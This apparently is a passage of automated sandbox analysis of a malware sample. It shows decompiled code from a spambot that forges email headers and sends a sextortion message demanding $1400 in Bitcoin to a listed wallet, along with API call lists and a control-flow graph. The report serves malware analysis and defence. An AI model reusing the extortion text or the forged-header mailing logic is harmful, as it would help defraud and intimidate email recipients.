                                                                                                                                                                                                                                                                                    											_t78 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    											__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    											__eax = rand();
                                                                                                                                                                                                                                                                                    											asm("cdq");
                                                                                                                                                                                                                                                                                    											__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    											_t82 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    											__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    											__eax = rand();
                                                                                                                                                                                                                                                                                    											asm("cdq");
                                                                                                                                                                                                                                                                                    											__ecx = 0xd2;
                                                                                                                                                                                                                                                                                    											_t86 = __eax % 0xd2;
                                                                                                                                                                                                                                                                                    											E00EA1390(0xd2, 7,  &_v1708) =  &_v1172;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA( &_v1172, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n",  &_v1172, _t86 + 1, _t82 + 1, _t78 + 1, _t74 + 1,  &_v1292,  &_v1684);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                                    											_v1816 = __eax;
                                                                                                                                                                                                                                                                                    											__ecx = _v1816;
                                                                                                                                                                                                                                                                                    											__eax = _v32;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120(_v32,  &_v1172, _v1816); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												__ecx =  &_v1812;
                                                                                                                                                                                                                                                                                    												E00EA1320(__ecx, 3,  &_v1580) =  &_v1696;
                                                                                                                                                                                                                                                                                    												__eax = E00EA1320(__ecx, 5,  &_v1696);
                                                                                                                                                                                                                                                                                    												__ecx =  &_v1172;
                                                                                                                                                                                                                                                                                    												__eax = wsprintfA( &_v1172, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax,  &_v1172);
                                                                                                                                                                                                                                                                                    												__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    												_v1816 = __eax;
                                                                                                                                                                                                                                                                                    												__eax =  &_v1172;
                                                                                                                                                                                                                                                                                    												__ecx = _v32;
                                                                                                                                                                                                                                                                                    												__eax = E00EA1120(_v32,  &_v1172, _v1816); // executed
                                                                                                                                                                                                                                                                                    												if(__eax != 0) {
                                                                                                                                                                                                                                                                                    													__eax =  &_v1172;
                                                                                                                                                                                                                                                                                    													__eax = wsprintfA( &_v1172, "From: %s\r\n", _a4);
                                                                                                                                                                                                                                                                                    													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    													_v1816 = __eax;
                                                                                                                                                                                                                                                                                    													__ecx = _v1816;
                                                                                                                                                                                                                                                                                    													__eax = _v32;
                                                                                                                                                                                                                                                                                    													__eax = E00EA1120(_v32,  &_v1172, _v1816); // executed
                                                                                                                                                                                                                                                                                    													if(__eax != 0) {
                                                                                                                                                                                                                                                                                    														__ecx = _a4;
                                                                                                                                                                                                                                                                                    														__eax = wsprintfA( &_v1172, "To: %s\r\n", _a4);
                                                                                                                                                                                                                                                                                    														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    														_v1816 = __eax;
                                                                                                                                                                                                                                                                                    														__eax = _v1816;
                                                                                                                                                                                                                                                                                    														__ecx =  &_v1172;
                                                                                                                                                                                                                                                                                    														if(E00EA1120(_v32,  &_v1172, _v1816) != 0) {
                                                                                                                                                                                                                                                                                    															__eax =  &_v1172;
                                                                                                                                                                                                                                                                                    															__eax = wsprintfA( &_v1172, "Subject: %s\r\n", "I RECORDED YOU!");
                                                                                                                                                                                                                                                                                    															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    															_v1816 = __eax;
                                                                                                                                                                                                                                                                                    															__ecx = _v1816;
                                                                                                                                                                                                                                                                                    															__eax = _v32;
                                                                                                                                                                                                                                                                                    															__eax = E00EA1120(_v32,  &_v1172, _v1816); // executed
                                                                                                                                                                                                                                                                                    															if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																__ecx =  &_v1684;
                                                                                                                                                                                                                                                                                    																__eax = wsprintfA( &_v1172, "Date: %s\r\n",  &_v1684);
                                                                                                                                                                                                                                                                                    																__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    																_v1816 = __eax;
                                                                                                                                                                                                                                                                                    																__eax = _v1816;
                                                                                                                                                                                                                                                                                    																__ecx =  &_v1172;
                                                                                                                                                                                                                                                                                    																__eax = E00EA1120(_v32,  &_v1172, _v1816); // executed
                                                                                                                                                                                                                                                                                    																if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																	__eax =  &_v1292;
                                                                                                                                                                                                                                                                                    																	__ecx =  &_v1580;
                                                                                                                                                                                                                                                                                    																	E00EA1320(__ecx, 6, __ecx) = E00EA1320(__ecx, 6,  &_v1696);
                                                                                                                                                                                                                                                                                    																	__eax =  &_v1172;
                                                                                                                                                                                                                                                                                    																	__eax = wsprintfA( &_v1172, "Message-ID: <%s.%s@%s>\r\n",  &_v1172,  &_v1172,  &_v1292);
                                                                                                                                                                                                                                                                                    																	__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    																	_v1816 = __eax;
                                                                                                                                                                                                                                                                                    																	__ecx = _v1816;
                                                                                                                                                                                                                                                                                    																	__eax = _v32;
                                                                                                                                                                                                                                                                                    																	__eax = E00EA1120(_v32,  &_v1172, _v1816); // executed
                                                                                                                                                                                                                                                                                    																	if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																		__ecx = _v32;
                                                                                                                                                                                                                                                                                    																		if(E00EA1120(_v32, "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																			__eax = E00EA1120(_v32, "Content-type: text/plain;\r\n\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																			if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																				 &_v1556 = memset( &_v1556, 0, 0x104);
                                                                                                                                                                                                                                                                                    																				__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																				strcpy( &_v1556, "Hello there!\r\n\r\n") = strcat( &_v1556, "Unfortunately, there are some bad news for you.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				 &_v1556 = strcat( &_v1556, "Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																				 &_v1556 = strcat( &_v1556, "You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																				 &_v1556 = strcat( &_v1556, "All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																				strcat( &_v1556, "After the transaction is successful, I will proceed to delete everything without delay.\r\n\r\n") = _v32;
                                                                                                                                                                                                                                                                                    																				__eax = E00EA1120(_v32,  &_v1556, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																				if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																					__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																					memset( &_v1556, 0, 0x104) = strcpy( &_v1556, "Afterwards, we can pretend that we have never met before.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																					 &_v1556 = strcat( &_v1556, "In addition, I assure you that all the harmful software will be deleted from your device.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																					__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																					 &_v1556 = strcat( &_v1556, "My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX\r\n\r\n");
                                                                                                                                                                                                                                                                                    																					__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																					 &_v1556 = strcat( &_v1556, "Everything will be carried out based on fairness!\r\n\r\n");
                                                                                                                                                                                                                                                                                    																					__ecx =  &_v1556;
                                                                                                                                                                                                                                                                                    																					strcat( &_v1556, "An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.\r\n.\r\n") = _v32;
                                                                                                                                                                                                                                                                                    																					if(E00EA1120(_v32,  &_v1556, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																						_v36 = 7;
                                                                                                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                                                                                                    																						_v36 = 0;
                                                                                                                                                                                                                                                                                    																					}
                                                                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                                                                    																					_v36 = 0;
                                                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                                                                    																				_v36 = 0;
                                                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                                                    																			_v36 = 0;
                                                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                                                    																		_v36 = 0;
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	_v36 = 0;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																_v36 = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															_v36 = 0;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														_v36 = 0;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													_v36 = 0;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v36 = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    										case 6:
                                                                                                                                                                                                                                                                                    											__ecx = _v32;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120(_v32, "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    											_v36 = 8;
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = 0 | _v36 == 0x00000008;
                                                                                                                                                                                                                                                                                    						goto L56;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                                                                    0x00ea19e9
                                                                                                                                                                                                                                                                                    0x00ea19f6
                                                                                                                                                                                                                                                                                    0x00ea19fb
                                                                                                                                                                                                                                                                                    0x00ea19fe
                                                                                                                                                                                                                                                                                    0x00ea1a05
                                                                                                                                                                                                                                                                                    0x00ea2233
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea1a11
                                                                                                                                                                                                                                                                                    0x00ea1a1c
                                                                                                                                                                                                                                                                                    0x00ea1a21
                                                                                                                                                                                                                                                                                    0x00ea1a26
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1a32
                                                                                                                                                                                                                                                                                    0x00ea1a38
                                                                                                                                                                                                                                                                                    0x00ea1a3f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1a4f
                                                                                                                                                                                                                                                                                    0x00ea1a59
                                                                                                                                                                                                                                                                                    0x00ea1a62
                                                                                                                                                                                                                                                                                    0x00ea221d
                                                                                                                                                                                                                                                                                    0x00ea2223
                                                                                                                                                                                                                                                                                    0x00ea222d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1a68
                                                                                                                                                                                                                                                                                    0x00ea1a68
                                                                                                                                                                                                                                                                                    0x00ea1a83
                                                                                                                                                                                                                                                                                    0x00ea1a89
                                                                                                                                                                                                                                                                                    0x00ea1a90
                                                                                                                                                                                                                                                                                    0x00ea1ab4
                                                                                                                                                                                                                                                                                    0x00ea1ab9
                                                                                                                                                                                                                                                                                    0x00ea1abc
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea1ad6
                                                                                                                                                                                                                                                                                    0x00ea1ae5
                                                                                                                                                                                                                                                                                    0x00ea1aea
                                                                                                                                                                                                                                                                                    0x00ea1aef
                                                                                                                                                                                                                                                                                    0x00ea1af9
                                                                                                                                                                                                                                                                                    0x00ea1b08
                                                                                                                                                                                                                                                                                    0x00ea1b15
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00ea1b21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b3c
                                                                                                                                                                                                                                                                                    0x00ea1b71
                                                                                                                                                                                                                                                                                    0x00ea1b77
                                                                                                                                                                                                                                                                                    0x00ea1b7a
                                                                                                                                                                                                                                                                                    0x00ea1b3e
                                                                                                                                                                                                                                                                                    0x00ea1b4f
                                                                                                                                                                                                                                                                                    0x00ea1b55
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b92
                                                                                                                                                                                                                                                                                    0x00ea1b97
                                                                                                                                                                                                                                                                                    0x00ea1b9c
                                                                                                                                                                                                                                                                                    0x00ea1baa
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bbf
                                                                                                                                                                                                                                                                                    0x00ea1bc6
                                                                                                                                                                                                                                                                                    0x00ea1bcc
                                                                                                                                                                                                                                                                                    0x00ea1bdb
                                                                                                                                                                                                                                                                                    0x00ea1be2
                                                                                                                                                                                                                                                                                    0x00ea1be8
                                                                                                                                                                                                                                                                                    0x00ea1beb
                                                                                                                                                                                                                                                                                    0x00ea1bf1
                                                                                                                                                                                                                                                                                    0x00ea1bff
                                                                                                                                                                                                                                                                                    0x00ea1c03
                                                                                                                                                                                                                                                                                    0x00ea1c0d
                                                                                                                                                                                                                                                                                    0x00ea1c1b
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c37
                                                                                                                                                                                                                                                                                    0x00ea1c3d
                                                                                                                                                                                                                                                                                    0x00ea1c40
                                                                                                                                                                                                                                                                                    0x00ea1c46
                                                                                                                                                                                                                                                                                    0x00ea1c4d
                                                                                                                                                                                                                                                                                    0x00ea1c58
                                                                                                                                                                                                                                                                                    0x00ea1c62
                                                                                                                                                                                                                                                                                    0x00ea1c70
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c83
                                                                                                                                                                                                                                                                                    0x00ea1c87
                                                                                                                                                                                                                                                                                    0x00ea1c91
                                                                                                                                                                                                                                                                                    0x00ea1c9f
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cc9
                                                                                                                                                                                                                                                                                    0x00ea1ccf
                                                                                                                                                                                                                                                                                    0x00ea1cdd
                                                                                                                                                                                                                                                                                    0x00ea1cea
                                                                                                                                                                                                                                                                                    0x00ea1cf2
                                                                                                                                                                                                                                                                                    0x00ea1cfb
                                                                                                                                                                                                                                                                                    0x00ea1d0a
                                                                                                                                                                                                                                                                                    0x00ea1d11
                                                                                                                                                                                                                                                                                    0x00ea1d16
                                                                                                                                                                                                                                                                                    0x00ea1d17
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d22
                                                                                                                                                                                                                                                                                    0x00ea1d27
                                                                                                                                                                                                                                                                                    0x00ea1d28
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d33
                                                                                                                                                                                                                                                                                    0x00ea1d38
                                                                                                                                                                                                                                                                                    0x00ea1d39
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d44
                                                                                                                                                                                                                                                                                    0x00ea1d49
                                                                                                                                                                                                                                                                                    0x00ea1d4a
                                                                                                                                                                                                                                                                                    0x00ea1d4f
                                                                                                                                                                                                                                                                                    0x00ea1d6c
                                                                                                                                                                                                                                                                                    0x00ea1d73
                                                                                                                                                                                                                                                                                    0x00ea1d79
                                                                                                                                                                                                                                                                                    0x00ea1d7c
                                                                                                                                                                                                                                                                                    0x00ea1d82
                                                                                                                                                                                                                                                                                    0x00ea1d90
                                                                                                                                                                                                                                                                                    0x00ea1d94
                                                                                                                                                                                                                                                                                    0x00ea1d9e
                                                                                                                                                                                                                                                                                    0x00ea1dac
                                                                                                                                                                                                                                                                                    0x00ea1dc5
                                                                                                                                                                                                                                                                                    0x00ea1dce
                                                                                                                                                                                                                                                                                    0x00ea1ddc
                                                                                                                                                                                                                                                                                    0x00ea1de3
                                                                                                                                                                                                                                                                                    0x00ea1de9
                                                                                                                                                                                                                                                                                    0x00ea1dec
                                                                                                                                                                                                                                                                                    0x00ea1df9
                                                                                                                                                                                                                                                                                    0x00ea1e00
                                                                                                                                                                                                                                                                                    0x00ea1e04
                                                                                                                                                                                                                                                                                    0x00ea1e0e
                                                                                                                                                                                                                                                                                    0x00ea1e25
                                                                                                                                                                                                                                                                                    0x00ea1e2c
                                                                                                                                                                                                                                                                                    0x00ea1e32
                                                                                                                                                                                                                                                                                    0x00ea1e35
                                                                                                                                                                                                                                                                                    0x00ea1e3b
                                                                                                                                                                                                                                                                                    0x00ea1e49
                                                                                                                                                                                                                                                                                    0x00ea1e4d
                                                                                                                                                                                                                                                                                    0x00ea1e57
                                                                                                                                                                                                                                                                                    0x00ea1e65
                                                                                                                                                                                                                                                                                    0x00ea1e75
                                                                                                                                                                                                                                                                                    0x00ea1e7b
                                                                                                                                                                                                                                                                                    0x00ea1e7e
                                                                                                                                                                                                                                                                                    0x00ea1e84
                                                                                                                                                                                                                                                                                    0x00ea1e8b
                                                                                                                                                                                                                                                                                    0x00ea1ea0
                                                                                                                                                                                                                                                                                    0x00ea1eb8
                                                                                                                                                                                                                                                                                    0x00ea1ebf
                                                                                                                                                                                                                                                                                    0x00ea1ec5
                                                                                                                                                                                                                                                                                    0x00ea1ec8
                                                                                                                                                                                                                                                                                    0x00ea1ece
                                                                                                                                                                                                                                                                                    0x00ea1edc
                                                                                                                                                                                                                                                                                    0x00ea1ee0
                                                                                                                                                                                                                                                                                    0x00ea1eea
                                                                                                                                                                                                                                                                                    0x00ea1ef8
                                                                                                                                                                                                                                                                                    0x00ea1f0b
                                                                                                                                                                                                                                                                                    0x00ea1f11
                                                                                                                                                                                                                                                                                    0x00ea1f14
                                                                                                                                                                                                                                                                                    0x00ea1f1a
                                                                                                                                                                                                                                                                                    0x00ea1f21
                                                                                                                                                                                                                                                                                    0x00ea1f2c
                                                                                                                                                                                                                                                                                    0x00ea1f36
                                                                                                                                                                                                                                                                                    0x00ea1f44
                                                                                                                                                                                                                                                                                    0x00ea1f4b
                                                                                                                                                                                                                                                                                    0x00ea1f66
                                                                                                                                                                                                                                                                                    0x00ea1f74
                                                                                                                                                                                                                                                                                    0x00ea1f7b
                                                                                                                                                                                                                                                                                    0x00ea1f81
                                                                                                                                                                                                                                                                                    0x00ea1f84
                                                                                                                                                                                                                                                                                    0x00ea1f8a
                                                                                                                                                                                                                                                                                    0x00ea1f98
                                                                                                                                                                                                                                                                                    0x00ea1f9c
                                                                                                                                                                                                                                                                                    0x00ea1fa6
                                                                                                                                                                                                                                                                                    0x00ea1fbb
                                                                                                                                                                                                                                                                                    0x00ea1fc9
                                                                                                                                                                                                                                                                                    0x00ea1fe2
                                                                                                                                                                                                                                                                                    0x00ea1fec
                                                                                                                                                                                                                                                                                    0x00ea2008
                                                                                                                                                                                                                                                                                    0x00ea2015
                                                                                                                                                                                                                                                                                    0x00ea2030
                                                                                                                                                                                                                                                                                    0x00ea2044
                                                                                                                                                                                                                                                                                    0x00ea2051
                                                                                                                                                                                                                                                                                    0x00ea2080
                                                                                                                                                                                                                                                                                    0x00ea208d
                                                                                                                                                                                                                                                                                    0x00ea20bc
                                                                                                                                                                                                                                                                                    0x00ea20c9
                                                                                                                                                                                                                                                                                    0x00ea20e1
                                                                                                                                                                                                                                                                                    0x00ea20e5
                                                                                                                                                                                                                                                                                    0x00ea20ef
                                                                                                                                                                                                                                                                                    0x00ea2104
                                                                                                                                                                                                                                                                                    0x00ea211f
                                                                                                                                                                                                                                                                                    0x00ea2133
                                                                                                                                                                                                                                                                                    0x00ea2140
                                                                                                                                                                                                                                                                                    0x00ea216f
                                                                                                                                                                                                                                                                                    0x00ea217c
                                                                                                                                                                                                                                                                                    0x00ea21ab
                                                                                                                                                                                                                                                                                    0x00ea21b8
                                                                                                                                                                                                                                                                                    0x00ea21d0
                                                                                                                                                                                                                                                                                    0x00ea21de
                                                                                                                                                                                                                                                                                    0x00ea21e9
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea21f9
                                                                                                                                                                                                                                                                                    0x00ea21fd
                                                                                                                                                                                                                                                                                    0x00ea2205
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00ea1a62

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA2260: strchr.MSVCR90 ref: 00EA226B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA10A0: DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,00000000,00000000), ref: 00EA10C4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA10A0: htons.WS2_32(00000019), ref: 00EA10F5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA10A0: DnsFree.DNSAPI(00000000,00000001), ref: 00EA110F
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00EA1A32
                                                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 00EA1A59
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,00000006,00000001,00000001,00000004), ref: 00EA1A83
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(000000FF,00000002), ref: 00EA2223
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00EA222D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeQuery_closesocketconnecthtonssetsockoptshutdownsocketstrchr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3655475579-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 462d5be174de2741238a1849446ef0cb6799e8082d113bf4f903ef4ffae91acf
                                                                                                                                                                                                                                                                                    • Instruction ID: 93731c1210d945ef9f8f9d5aa4404a8b3cb4cde8656a74e5416cce4f51d74ee1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 462d5be174de2741238a1849446ef0cb6799e8082d113bf4f903ef4ffae91acf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C415EB5D00218DFDB24CBA8DC49BEDB7B4BB59304F005198E6197B2D0E7746A85CF61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 267 ea1c27-ea1c62 wsprintfA call ea1120 270 ea1c70-ea1c77 267->270 271 ea1c64-ea1c6b 267->271 272 ea220c 270->272 271->272 274 ea1a9a-ea1a9e 272->274 275 ea2211-ea222d shutdown closesocket 272->275 274->275 277 ea1aa4-ea1ab4 call ea1160 274->277 278 ea2233-ea2239 275->278 280 ea1ab9-ea1ac9 277->280 281 ea1acb 280->281 282 ea1ad0-ea1aef call ea11c0 280->282 281->275 285 ea1af1 282->285 286 ea1af6-ea1b15 282->286 285->275 286->272 287 ea1b1b 286->287 287->272
                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00EA1C27(void* __eflags) {
                                                                                                                                                                                                                                                                                    				void* _t167;
                                                                                                                                                                                                                                                                                    				intOrPtr _t171;
                                                                                                                                                                                                                                                                                    				void* _t172;
                                                                                                                                                                                                                                                                                    				void* _t197;
